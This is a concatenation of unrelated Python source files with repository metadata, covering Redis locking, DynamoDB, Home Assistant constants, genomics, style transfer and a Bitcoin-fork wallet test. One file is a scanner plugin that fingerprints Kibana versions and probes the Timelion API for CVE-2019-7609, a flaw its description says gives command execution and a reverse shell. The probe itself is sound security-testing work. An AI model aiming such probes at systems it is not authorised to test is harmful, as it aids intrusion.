redis_errors.append(error)
_logger.exception(
'%s.release() caught %s',
self.__class__.__name__,
error.__class__.__name__,
)
else:
if num_masters_released > len(self.masters) // 2:
return
self._check_enough_masters_up(raise_on_redis_errors, redis_errors)
raise ReleaseUnlockedLock(
self.key,
self.masters,
redis_errors=redis_errors,
)
__release = release
def __enter__(self) -> 'Redlock':
'''You can use a Redlock as a context manager.
Usage:
>>> states = []
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> with Redlock(key='printer', masters={redis}) as printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
>>> states = []
>>> with printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
'''
acquired = self.__acquire(
blocking=self.context_manager_blocking,
timeout=self.context_manager_timeout,
)
if acquired:
return self
raise QuorumNotAchieved(self.key, self.masters)
@overload
def __exit__(self,
exc_type: None,
exc_value: None,
exc_traceback: None,
) -> Literal[False]:
raise NotImplementedError
@overload
def __exit__(self,
exc_type: Type[BaseException],
exc_value: BaseException,
exc_traceback: TracebackType,
) -> Literal[False]:
raise NotImplementedError
def __exit__(self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
traceback: Optional[TracebackType],
) -> Literal[False]:
'''You can use a Redlock as a context manager.
Usage:
>>> states = []
>>> from redis import Redis
>>> redis = Redis(socket_timeout=1)
>>> with Redlock(key='printer', masters={redis}) as printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
>>> states = []
>>> with printer_lock:
... states.append(bool(printer_lock.locked()))
... # Critical section - print stuff here.
>>> states.append(bool(printer_lock.locked()))
>>> states
[True, False]
'''
self.__release()
return False
def __repr__(self) -> str:
return f'<{self.__class__.__name__} key={self.key}>'
def synchronize(*,
key: str,
masters: Iterable[Redis] = frozenset(),
raise_on_redis_errors: bool = False,
auto_release_time: int = AUTO_RELEASE_TIME,
blocking: bool = True,
timeout: float = -1,
) -> Callable[[F], F]:
'''Decorator to synchronize a function's execution across threads.
synchronize() is a decorator that allows only one thread to execute a
function at a time. Under the hood, synchronize() uses a Redlock. See
help(Redlock) for more details.
Usage:
>>> @synchronize(key='synchronized-func', auto_release_time=1500)
... def func():
... # Only one thread can execute this function at a time.
... return True
...
>>> func()
True
'''
RedlockFactory = functools.partial(
Redlock,
key=key,
masters=masters,
raise_on_redis_errors=raise_on_redis_errors,
auto_release_time=auto_release_time,
context_manager_blocking=blocking,
context_manager_timeout=timeout,
)
def decorator(func: F) -> F:
@functools.wraps(func)
def wrapper(*args: Any, **kwargs: Any) -> Any:
redlock = RedlockFactory()
waiting_timer, holding_timer = ContextTimer(), ContextTimer()
try:
waiting_timer.start()
with redlock:
waiting_timer.stop()
holding_timer.start()
return_value = func(*args, **kwargs)
holding_timer.stop()
finally:
_log_synchronize(func, redlock, waiting_timer, holding_timer)
return return_value
return cast(F, wrapper)
return decorator
def _log_synchronize(func: F,
redlock: Redlock,
waiting_timer: ContextTimer,
holding_timer: ContextTimer,
) -> None:
try:
_logger.info(
'%s() waited for %s for %d ms; held for %d ms',
func.__qualname__,
redlock.key,
waiting_timer.elapsed(),
holding_timer.elapsed(),
)
except RuntimeError: # pragma: no cover
# holding_timer.elapsed() threw a RuntimeError, which means that
# holding_timer never started, which means that we never acquired the
# lock / entered the critical section.
_logger.info(
'%s() waited for %s for %d ms; never acquired lock',
func.__qualname__,
redlock.key,
waiting_timer.elapsed(),
)
if __name__ == '__main__':
# Run the doctests in this module with:
# $ source venv/bin/activate
# $ python3 -m pottery.redlock
# $ deactivate
with contextlib.suppress(ImportError):
from tests.base import run_doctests # type: ignore
run_doctests()
| 35.533069
| 95
| 0.543126
|
bb2c9c4cb8053b03187c6144b05bb06ef20b1282
| 889
|
py
|
Python
|
DynamoDB/MoviesItemOps02.py
|
Kunal-Karnik/content-lambda-boto3
|
0bde85c1bc036c8000505ff9969be5f7666a12c2
|
[
"MIT"
] | null | null | null |
DynamoDB/MoviesItemOps02.py
|
Kunal-Karnik/content-lambda-boto3
|
0bde85c1bc036c8000505ff9969be5f7666a12c2
|
[
"MIT"
] | null | null | null |
DynamoDB/MoviesItemOps02.py
|
Kunal-Karnik/content-lambda-boto3
|
0bde85c1bc036c8000505ff9969be5f7666a12c2
|
[
"MIT"
] | null | null | null |
import decimal
import json
import boto3
from boto3.dynamodb.conditions import Attr, Key
from botocore.exceptions import ClientError
class DecimalEncoder(json.JSONEncoder):
'''Helper class to convert a DynamoDB item to JSON'''
def default(self, o):
if isinstance(o, decimal.Decimal):
if o % 1 > 0:
return float(o)
else:
return int(o)
return super(DecimalEncoder, self).default(o)
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('Movies')
title = "The Big New Movie"
year = 2015
try:
response = table.get_item(
Key={
'year': year,
'title': title
}
)
except ClientError as e:
print(e.response['Error']['Message'])
else:
item = response['Item']
print("GetItem succeeded:")
print(json.dumps(item, indent=4, cls=DecimalEncoder))
| 21.682927
| 57
| 0.618673
|
0ad4c7eb478daa3e4754cf2533e374f319e53646
| 3,255
|
py
|
Python
|
python/app/plugins/http/Kibana/CVE_2019_7609.py
|
taomujian/linbing
|
fe772a58f41e3b046b51a866bdb7e4655abaf51a
|
[
"MIT"
] | 351
|
2020-02-26T05:23:26.000Z
|
2022-03-26T12:39:19.000Z
|
python/app/plugins/http/Kibana/CVE_2019_7609.py
|
taomujian/linbing
|
fe772a58f41e3b046b51a866bdb7e4655abaf51a
|
[
"MIT"
] | 15
|
2020-03-26T07:31:49.000Z
|
2022-03-09T02:12:17.000Z
|
python/app/plugins/http/Kibana/CVE_2019_7609.py
|
taomujian/linbing
|
fe772a58f41e3b046b51a866bdb7e4655abaf51a
|
[
"MIT"
] | 99
|
2020-02-28T07:30:46.000Z
|
2022-03-16T16:41:09.000Z
|
#!/usr/bin/env python3
import re
import time
import random
import binascii
from app.lib.utils.request import request
from app.lib.utils.common import get_capta, get_useragent
class CVE_2019_7609_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'CVE-2019-7609漏洞',
'description': 'CVE-2019-7609漏洞可执行任意命令,反弹shell, 影响范围为: Kibana < 5.6.15, < 6.6.1',
'date': '2019-02-07',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
self.version = '9.9.9'
self.capta = get_capta()
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
def get_kibana_version(self):
"""
获取kibana版本号
:param:
:return:
"""
headers = {
'Referer': self.url,
'User-Agent': get_useragent()
}
r = request.get(self.url+"/app/kibana", headers = headers)
patterns = ['"version":"(.*?)",', '"version":"(.*?)",']
for pattern in patterns:
match = re.findall(pattern, r.text)
if match:
self.version = match[0]
def version_compare(self, standard_version, compare_version):
"""
比较目标kibana版本号是否受影响
:param str standard_version: 被比较的版本
:param str compare_version: 要比较的版本
:return bool True or False: 比较的结果
"""
sc = standard_version.split(".")
cc = compare_version.split(".")
if len(sc) == 3 and len(cc) == 3:
if sc[0].isdigit() and sc[1].isdigit() and sc[2].isdigit() and cc[0].isdigit() and cc[1].isdigit() and cc[2].isdigit():
sc_value = 100 * int(sc[0]) + 10 * int(sc[1]) + int(sc[2])
cc_value = 100 * int(cc[0]) + 10 * int(cc[1]) + int(cc[2])
if sc_value > cc_value:
return True
return False
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
self.get_kibana_version()
if self.version == '9.9.9' or not self.version_compare("6.6.1", self.version):
return False
headers = {
'Content-Type': 'application/json;charset=utf-8',
'Referer': self.url,
'kbn-version': self.version,
'User-Agent': get_useragent()
}
data = '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
try:
r = request.post(self.url + "/api/timelion/run", data = data, headers = headers)
if r.status_code == 200 and 'application/json' in r.headers.get('content-type', '') and '"seriesList"' in r.text:
print("存在CVE-2019-7609漏洞")
return True
else:
print("不存在CVE-2019-7609漏洞")
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
CVE_2019_7609 = CVE_2019_7609_BaseVerify('http://192.168.30.242:5601')
CVE_2019_7609.check()
| 31.601942
| 133
| 0.523195
|
3f605e0167fa7674531f5baa4bab8a1a92cf35f9
| 698
|
py
|
Python
|
devilry/devilry_group/migrations/0010_auto_20160107_1106.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | 29
|
2015-01-18T22:56:23.000Z
|
2020-11-10T21:28:27.000Z
|
devilry/devilry_group/migrations/0010_auto_20160107_1106.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | 786
|
2015-01-06T16:10:18.000Z
|
2022-03-16T11:10:50.000Z
|
devilry/devilry_group/migrations/0010_auto_20160107_1106.py
|
aless80/devilry-django
|
416c262e75170d5662542f15e2d7fecf5ab84730
|
[
"BSD-3-Clause"
] | 15
|
2015-04-06T06:18:43.000Z
|
2021-02-24T12:28:30.000Z
|
# -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('devilry_group', '0009_auto_20160107_1100'),
]
operations = [
migrations.RemoveField(
model_name='groupcomment',
name='part_of_grading',
),
migrations.RemoveField(
model_name='groupcomment',
name='visibility',
),
migrations.RemoveField(
model_name='imageannotationcomment',
name='part_of_grading',
),
migrations.RemoveField(
model_name='imageannotationcomment',
name='visibility',
),
]
| 22.516129
| 53
| 0.563037
|
e62ed4a3b12dc58192b5c34c93e9ad3810332e6a
| 3,896
|
py
|
Python
|
custom_components/powercalc/const.py
|
alanpaone/homeassistant-powercalc
|
dbf67b730a72b8ddc3e60659089368c112b62dd3
|
[
"MIT"
] | null | null | null |
custom_components/powercalc/const.py
|
alanpaone/homeassistant-powercalc
|
dbf67b730a72b8ddc3e60659089368c112b62dd3
|
[
"MIT"
] | null | null | null |
custom_components/powercalc/const.py
|
alanpaone/homeassistant-powercalc
|
dbf67b730a72b8ddc3e60659089368c112b62dd3
|
[
"MIT"
] | null | null | null |
"""The Powercalc constants."""
DOMAIN = "powercalc"
DOMAIN_CONFIG = "config"
DATA_CALCULATOR_FACTORY = "calculator_factory"
DATA_CONFIGURED_ENTITIES = "configured_entities"
DATA_DISCOVERED_ENTITIES = "discovered_entities"
DUMMY_ENTITY_ID = "dummy"
CONF_AREA = "area"
CONF_CALIBRATE = "calibrate"
CONF_CREATE_GROUP = "create_group"
CONF_CREATE_ENERGY_SENSOR = "create_energy_sensor"
CONF_CREATE_ENERGY_SENSORS = "create_energy_sensors"
CONF_CREATE_UTILITY_METERS = "create_utility_meters"
CONF_DAILY_FIXED_ENERGY = "daily_fixed_energy"
CONF_ENABLE_AUTODISCOVERY = "enable_autodiscovery"
CONF_ENERGY_INTEGRATION_METHOD = "energy_integration_method"
CONF_ENERGY_SENSOR_NAMING = "energy_sensor_naming"
CONF_FIXED = "fixed"
CONF_GROUP = "group"
CONF_INCLUDE = "include"
CONF_LINEAR = "linear"
CONF_MODEL = "model"
CONF_MANUFACTURER = "manufacturer"
CONF_MODE = "mode"
CONF_MULTIPLY_FACTOR = "multiply_factor"
CONF_MULTIPLY_FACTOR_STANDBY = "multiply_factor_standby"
CONF_MIN_WATT = "min_watt"
CONF_MAX_WATT = "max_watt"
CONF_POWER_FACTOR = "power_factor"
CONF_POWER_SENSOR_NAMING = "power_sensor_naming"
CONF_POWER = "power"
CONF_POWER_SENSOR_ID = "power_sensor_id"
CONF_MIN_POWER = "min_power"
CONF_MAX_POWER = "max_power"
CONF_ON_TIME = "on_time"
CONF_TEMPLATE = "template"
CONF_UPDATE_FREQUENCY = "update_frequency"
CONF_VALUE = "value"
CONF_VOLTAGE = "voltage"
CONF_WATT = "watt"
CONF_WLED = "wled"
CONF_STATES_POWER = "states_power"
CONF_STANDBY_POWER = "standby_power"
CONF_DISABLE_STANDBY_POWER = "disable_standby_power"
CONF_CUSTOM_MODEL_DIRECTORY = "custom_model_directory"
CONF_UTILITY_METER_OFFSET = "utility_meter_offset"
CONF_UTILITY_METER_TYPES = "utility_meter_types"
DISCOVERY_SOURCE_ENTITY = "source_entity"
DISCOVERY_LIGHT_MODEL = "light_model"
ATTR_CALCULATION_MODE = "calculation_mode"
ATTR_ENTITIES = "entities"
ATTR_INTEGRATION = "integration"
ATTR_IS_GROUP = "is_group"
ATTR_SOURCE_ENTITY = "source_entity"
ATTR_SOURCE_DOMAIN = "source_domain"
MODE_DAILY_FIXED_ENERGY = "daily_fixed_energy"
MODE_LUT = "lut"
MODE_LINEAR = "linear"
MODE_FIXED = "fixed"
MODE_WLED = "wled"
CALCULATION_MODES = [
MODE_DAILY_FIXED_ENERGY,
MODE_FIXED,
MODE_LINEAR,
MODE_LUT,
MODE_WLED,
]
MANUFACTURER_DIRECTORY_MAPPING = {
"IKEA of Sweden": "ikea",
"Feibit Inc co. ": "jiawen",
"LEDVANCE": "ledvance",
"MLI": "mueller-licht",
"OSRAM": "osram",
"Signify Netherlands B.V.": "signify",
"Aqara": "aqara",
}
MANUFACTURER_ALIASES = {
"Philips": "Signify Netherlands B.V.",
"IKEA": "Ikea of Sweden",
"Xiaomi": "Aqara",
"LUMI": "Aqara",
}
MODEL_DIRECTORY_MAPPING = {
"IKEA of Sweden": {
"TRADFRI bulb E14 WS opal 400lm": "LED1536G5",
"TRADFRI bulb GU10 WS 400lm": "LED1537R6",
"TRADFRI bulb E27 WS opal 980lm": "LED1545G12",
"TRADFRI bulb E27 WS clear 950lm": "LED1546G12",
"TRADFRI bulb E27 opal 1000lm": "LED1623G12",
"TRADFRI bulb E27 CWS opal 600lm": "LED1624G9",
"TRADFRI bulb E14 W op/ch 400lm": "LED1649C5",
"TRADFRI bulb GU10 W 400lm": "LED1650R5",
"TRADFRI bulb E27 WS opal 1000lm": "LED1732G11",
"TRADFRI bulb E14 WS opal 600lm": "LED1733G7",
"TRADFRI bulb E27 WS clear 806lm": "LED1736G9",
"TRADFRI bulb E14 WS opal 600lm": "LED1738G7",
"TRADFRI bulb E14 WS 470lm": "LED1835C6",
"TRADFRI bulb E27 WW 806lm": "LED1836G9",
"TRADFRI bulb E27 WW clear 250lm": "LED1842G3",
"TRADFRI bulb GU10 WW 400lm": "LED1837R5",
"TRADFRIbulbE14WSglobeopal470lm": "LED2002G5",
"LEPTITER Recessed spot light": "T1820",
},
"Signify Netherlands B.V.": {
"440400982841": "LCT024",
"8718696449691": "LWB010",
"3417711P6": "LTW017",
"3418931P6": "LTC012",
"3261030P6": "LTC001",
"3261031P6": "LTC001",
"3261048P6": "LTC001",
},
}
| 31.419355
| 60
| 0.717659
|
b6df24e95eaabe066ddb1c2138e75e986ff553f7
| 2,328
|
py
|
Python
|
skgenome/rangelabel.py
|
jeremy9959/cnvkit
|
b839a2b323113a7d318d216f61a0ed6657c70ed4
|
[
"Apache-2.0"
] | null | null | null |
skgenome/rangelabel.py
|
jeremy9959/cnvkit
|
b839a2b323113a7d318d216f61a0ed6657c70ed4
|
[
"Apache-2.0"
] | null | null | null |
skgenome/rangelabel.py
|
jeremy9959/cnvkit
|
b839a2b323113a7d318d216f61a0ed6657c70ed4
|
[
"Apache-2.0"
] | null | null | null |
"""Handle text genomic ranges as named tuples.
A range specification should look like ``chromosome:start-end``, e.g.
``chr1:1234-5678``, with 1-indexed integer coordinates. We also allow
``chr1:1234-`` or ``chr1:-5678``, where missing start becomes 0 and missing end
becomes None.
"""
from __future__ import absolute_import, division, print_function
from past.builtins import basestring
import collections
import re
Region = collections.namedtuple('Region', 'chromosome start end')
NamedRegion = collections.namedtuple('NamedRegion', 'chromosome start end gene')
re_label = re.compile(r'(\w+)?:(\d+)?-(\d+)?\s*(\S+)?')
def from_label(text, keep_gene=True):
"""Parse a chromosomal range specification.
Parameters
----------
text : string
Range specification, which should look like ``chr1:1234-5678`` or
``chr1:1234-`` or ``chr1:-5678``, where missing start becomes 0 and
missing end becomes None.
"""
match = re_label.match(text)
if match:
chrom, start, end, gene = match.groups()
start = int(start) - 1 if start else None
end = int(end) if end else None
if keep_gene:
gene = gene or ''
return NamedRegion(chrom, start, end, gene)
else:
return Region(chrom, start, end)
else:
raise ValueError("Invalid range spec: " + text
+ " (should be like: chr1:2333000-2444000)")
def to_label(row):
"""Convert a Region or (chrom, start, end) tuple to a region label."""
return "{}:{}-{}".format(row.chromosome, row.start + 1, row.end)
def unpack_range(a_range):
"""Extract chromosome, start, end from a string or tuple.
Examples::
"chr1" -> ("chr1", None, None)
"chr1:100-123" -> ("chr1", 99, 123)
("chr1", 100, 123) -> ("chr1", 100, 123)
"""
if not a_range:
return Region(None, None, None)
if isinstance(a_range, basestring):
if ':' in a_range and '-' in a_range:
return from_label(a_range, keep_gene=False)
return Region(a_range, None, None)
if isinstance(a_range, (list, tuple)):
if len(a_range) == 3:
return Region(*a_range)
elif len(a_range) == 4:
return Region(*a_range[:3])
raise ValueError("Not a range: %r" % a_range)
| 33.257143
| 80
| 0.616409
|
75d1297dc218895001206f58719403f4321c8ae6
| 1,331
|
py
|
Python
|
pystiche/papers/gatys_ecker_bethge_2015/utils.py
|
jbueltemeier/pystiche
|
0d0707121e63c4355303446e62a4894e86a7b763
|
[
"BSD-3-Clause"
] | null | null | null |
pystiche/papers/gatys_ecker_bethge_2015/utils.py
|
jbueltemeier/pystiche
|
0d0707121e63c4355303446e62a4894e86a7b763
|
[
"BSD-3-Clause"
] | null | null | null |
pystiche/papers/gatys_ecker_bethge_2015/utils.py
|
jbueltemeier/pystiche
|
0d0707121e63c4355303446e62a4894e86a7b763
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
from torch import nn, optim
from torch.optim.optimizer import Optimizer
import pystiche
from pystiche.enc import MultiLayerEncoder, vgg19_multi_layer_encoder
from pystiche.image import CaffePostprocessing, CaffePreprocessing
__all__ = [
"gatys_ecker_bethge_2015_preprocessor",
"gatys_ecker_bethge_2015_postprocessor",
"gatys_ecker_bethge_2015_optimizer",
"gatys_ecker_bethge_2015_multi_layer_encoder",
]
def gatys_ecker_bethge_2015_preprocessor() -> nn.Module:
return CaffePreprocessing()
def gatys_ecker_bethge_2015_postprocessor() -> nn.Module:
return CaffePostprocessing()
def gatys_ecker_bethge_2015_multi_layer_encoder(
impl_params: bool = True,
) -> MultiLayerEncoder:
multi_layer_encoder = vgg19_multi_layer_encoder(
weights="caffe", preprocessing=False, allow_inplace=True
)
if impl_params:
return multi_layer_encoder
for name, module in multi_layer_encoder.named_children():
if isinstance(module, nn.MaxPool2d):
multi_layer_encoder._modules[name] = nn.AvgPool2d(
**pystiche.pool_module_meta(module)
)
return multi_layer_encoder
def gatys_ecker_bethge_2015_optimizer(input_image: torch.Tensor) -> Optimizer:
return optim.LBFGS([input_image.requires_grad_(True)], lr=1.0, max_iter=1)
| 30.25
| 78
| 0.764838
|
33e918040726dff7342fb8a041d7d911842d41f8
| 577
|
py
|
Python
|
controleur/actionsCases/ActionsCasesUnJoueur.py
|
JordanSamhi/BricksBreaker
|
e2efb28e5ec43056e9665479920523576c692a6b
|
[
"MIT"
] | null | null | null |
controleur/actionsCases/ActionsCasesUnJoueur.py
|
JordanSamhi/BricksBreaker
|
e2efb28e5ec43056e9665479920523576c692a6b
|
[
"MIT"
] | null | null | null |
controleur/actionsCases/ActionsCasesUnJoueur.py
|
JordanSamhi/BricksBreaker
|
e2efb28e5ec43056e9665479920523576c692a6b
|
[
"MIT"
] | null | null | null |
from controleur.actionsCases.ActionsCases import ActionCases
class ActionsCasesUnJoueur(ActionCases):
def __init__(self, mode, app):
ActionCases.__init__(self, mode, app)
def detruireCases(self):
if len(self._semblables) >= self.LIMITE_NOMBRE_CASES and not self.semblablesSontDetruits():
for case in self._semblables:
case.detruire()
self._mode.getJoueur().ajouterScore(len(self._semblables))
self.gravite()
def update(self):
self._application.update()
| 38.466667
| 100
| 0.637782
|
1e705887dc3d45232139301b9f3b04e044df1279
| 10,475
|
py
|
Python
|
test/functional/listtransactions.py
|
aixinwang/Gfc
|
4a7fdac234f5f51055e471e77aaff62cfa4c6eab
|
[
"MIT"
] | null | null | null |
test/functional/listtransactions.py
|
aixinwang/Gfc
|
4a7fdac234f5f51055e471e77aaff62cfa4c6eab
|
[
"MIT"
] | null | null | null |
test/functional/listtransactions.py
|
aixinwang/Gfc
|
4a7fdac234f5f51055e471e77aaff62cfa4c6eab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The GFC coin bt developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the listtransactions API."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, COIN
from io import BytesIO
def txFromHex(hexstring):
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(hexstring))
tx.deserialize(f)
return tx
class ListTransactionsTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 4
self.setup_clean_chain = False
def setup_nodes(self):
#This test requires mocktime
self.enable_mocktime()
self.nodes = self.start_nodes(self.num_nodes, self.options.tmpdir)
def run_test(self):
# Simple send, 0 to 1:
txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
self.sync_all()
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid},
{"category":"send","account":"","amount":Decimal("-0.1"),"confirmations":0})
assert_array_result(self.nodes[1].listtransactions(),
{"txid":txid},
{"category":"receive","account":"","amount":Decimal("0.1"),"confirmations":0})
# mine a block, confirmations should change:
self.nodes[0].generate(1)
self.sync_all()
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid},
{"category":"send","account":"","amount":Decimal("-0.1"),"confirmations":1})
assert_array_result(self.nodes[1].listtransactions(),
{"txid":txid},
{"category":"receive","account":"","amount":Decimal("0.1"),"confirmations":1})
# send-to-self:
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 0.2)
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid, "category":"send"},
{"amount":Decimal("-0.2")})
assert_array_result(self.nodes[0].listtransactions(),
{"txid":txid, "category":"receive"},
{"amount":Decimal("0.2")})
# sendmany from node1: twice to self, twice to node2:
send_to = { self.nodes[0].getnewaddress() : 0.11,
self.nodes[1].getnewaddress() : 0.22,
self.nodes[0].getaccountaddress("from1") : 0.33,
self.nodes[1].getaccountaddress("toself") : 0.44 }
txid = self.nodes[1].sendmany("", send_to)
self.sync_all()
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.11")},
{"txid":txid} )
assert_array_result(self.nodes[0].listtransactions(),
{"category":"receive","amount":Decimal("0.11")},
{"txid":txid} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.22")},
{"txid":txid} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"receive","amount":Decimal("0.22")},
{"txid":txid} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.33")},
{"txid":txid} )
assert_array_result(self.nodes[0].listtransactions(),
{"category":"receive","amount":Decimal("0.33")},
{"txid":txid, "account" : "from1"} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"send","amount":Decimal("-0.44")},
{"txid":txid, "account" : ""} )
assert_array_result(self.nodes[1].listtransactions(),
{"category":"receive","amount":Decimal("0.44")},
{"txid":txid, "account" : "toself"} )
multisig = self.nodes[1].createmultisig(1, [self.nodes[1].getnewaddress()])
self.nodes[0].importaddress(multisig["redeemScript"], "watchonly", False, True)
txid = self.nodes[1].sendtoaddress(multisig["address"], 0.1)
self.nodes[1].generate(1)
self.sync_all()
assert(len(self.nodes[0].listtransactions("watchonly", 100, 0, False)) == 0)
assert_array_result(self.nodes[0].listtransactions("watchonly", 100, 0, True),
{"category":"receive","amount":Decimal("0.1")},
{"txid":txid, "account" : "watchonly"} )
self.run_rbf_opt_in_test()
# Check that the opt-in-rbf flag works properly, for sent and received
# transactions.
def run_rbf_opt_in_test(self):
# Check whether a transaction signals opt-in RBF itself
def is_opt_in(node, txid):
rawtx = node.getrawtransaction(txid, 1)
for x in rawtx["vin"]:
if x["sequence"] < 0xfffffffe:
return True
return False
# Find an unconfirmed output matching a certain txid
def get_unconfirmed_utxo_entry(node, txid_to_match):
utxo = node.listunspent(0, 0)
for i in utxo:
if i["txid"] == txid_to_match:
return i
return None
# 1. Chain a few transactions that don't opt-in.
txid_1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1)
assert(not is_opt_in(self.nodes[0], txid_1))
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_1}, {"bip125-replaceable":"no"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_1}, {"bip125-replaceable":"no"})
# Tx2 will build off txid_1, still not opting in to RBF.
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[0], txid_1)
assert_equal(utxo_to_use["safe"], True)
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[1], txid_1)
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[1], txid_1)
assert_equal(utxo_to_use["safe"], False)
# Create tx2 using createrawtransaction
inputs = [{"txid":utxo_to_use["txid"], "vout":utxo_to_use["vout"]}]
outputs = {self.nodes[0].getnewaddress(): 0.999}
tx2 = self.nodes[1].createrawtransaction(inputs, outputs)
tx2_signed = self.nodes[1].signrawtransaction(tx2)["hex"]
txid_2 = self.nodes[1].sendrawtransaction(tx2_signed)
# ...and check the result
assert(not is_opt_in(self.nodes[1], txid_2))
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_2}, {"bip125-replaceable":"no"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_2}, {"bip125-replaceable":"no"})
# Tx3 will opt-in to RBF
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[0], txid_2)
inputs = [{"txid": txid_2, "vout":utxo_to_use["vout"]}]
outputs = {self.nodes[1].getnewaddress(): 0.998}
tx3 = self.nodes[0].createrawtransaction(inputs, outputs)
tx3_modified = txFromHex(tx3)
tx3_modified.vin[0].nSequence = 0
tx3 = bytes_to_hex_str(tx3_modified.serialize())
tx3_signed = self.nodes[0].signrawtransaction(tx3)['hex']
txid_3 = self.nodes[0].sendrawtransaction(tx3_signed)
assert(is_opt_in(self.nodes[0], txid_3))
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_3}, {"bip125-replaceable":"yes"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_3}, {"bip125-replaceable":"yes"})
# Tx4 will chain off tx3. Doesn't signal itself, but depends on one
# that does.
utxo_to_use = get_unconfirmed_utxo_entry(self.nodes[1], txid_3)
inputs = [{"txid": txid_3, "vout":utxo_to_use["vout"]}]
outputs = {self.nodes[0].getnewaddress(): 0.997}
tx4 = self.nodes[1].createrawtransaction(inputs, outputs)
tx4_signed = self.nodes[1].signrawtransaction(tx4)["hex"]
txid_4 = self.nodes[1].sendrawtransaction(tx4_signed)
assert(not is_opt_in(self.nodes[1], txid_4))
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"yes"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"yes"})
# Replace tx3, and check that tx4 becomes unknown
tx3_b = tx3_modified
tx3_b.vout[0].nValue -= int(Decimal("0.004") * COIN) # bump the fee
tx3_b = bytes_to_hex_str(tx3_b.serialize())
tx3_b_signed = self.nodes[0].signrawtransaction(tx3_b)['hex']
txid_3b = self.nodes[0].sendrawtransaction(tx3_b_signed, True)
assert(is_opt_in(self.nodes[0], txid_3b))
assert_array_result(self.nodes[0].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"unknown"})
sync_mempools(self.nodes)
assert_array_result(self.nodes[1].listtransactions(), {"txid": txid_4}, {"bip125-replaceable":"unknown"})
# Check gettransaction as well:
for n in self.nodes[0:2]:
assert_equal(n.gettransaction(txid_1)["bip125-replaceable"], "no")
assert_equal(n.gettransaction(txid_2)["bip125-replaceable"], "no")
assert_equal(n.gettransaction(txid_3)["bip125-replaceable"], "yes")
assert_equal(n.gettransaction(txid_3b)["bip125-replaceable"], "yes")
assert_equal(n.gettransaction(txid_4)["bip125-replaceable"], "unknown")
# After mining a transaction, it's no longer BIP125-replaceable
self.nodes[0].generate(1)
assert(txid_3b not in self.nodes[0].getrawmempool())
assert_equal(self.nodes[0].gettransaction(txid_3b)["bip125-replaceable"], "no")
assert_equal(self.nodes[0].gettransaction(txid_4)["bip125-replaceable"], "unknown")
if __name__ == '__main__':
ListTransactionsTest().main()
| 50.360577
| 113
| 0.600764
|
c6f1fc9e1937519053a4eb16de238db84bda6e70
| 5,946
|
py
|
Python
|
tests/unit/test_filters.py
|
Dithn/warehouse
|
953b77ecfc7dade203db423307539ea9d6115657
|
[
"Apache-2.0"
] | 2
|
2021-10-11T21:52:57.000Z
|
2021-11-17T10:29:15.000Z
|
tests/unit/test_filters.py
|
Dithn/warehouse
|
953b77ecfc7dade203db423307539ea9d6115657
|
[
"Apache-2.0"
] | 85
|
2022-02-14T04:38:24.000Z
|
2022-03-31T04:42:30.000Z
|
tests/unit/test_filters.py
|
Dithn/warehouse
|
953b77ecfc7dade203db423307539ea9d6115657
|
[
"Apache-2.0"
] | 1
|
2020-12-01T21:12:24.000Z
|
2020-12-01T21:12:24.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
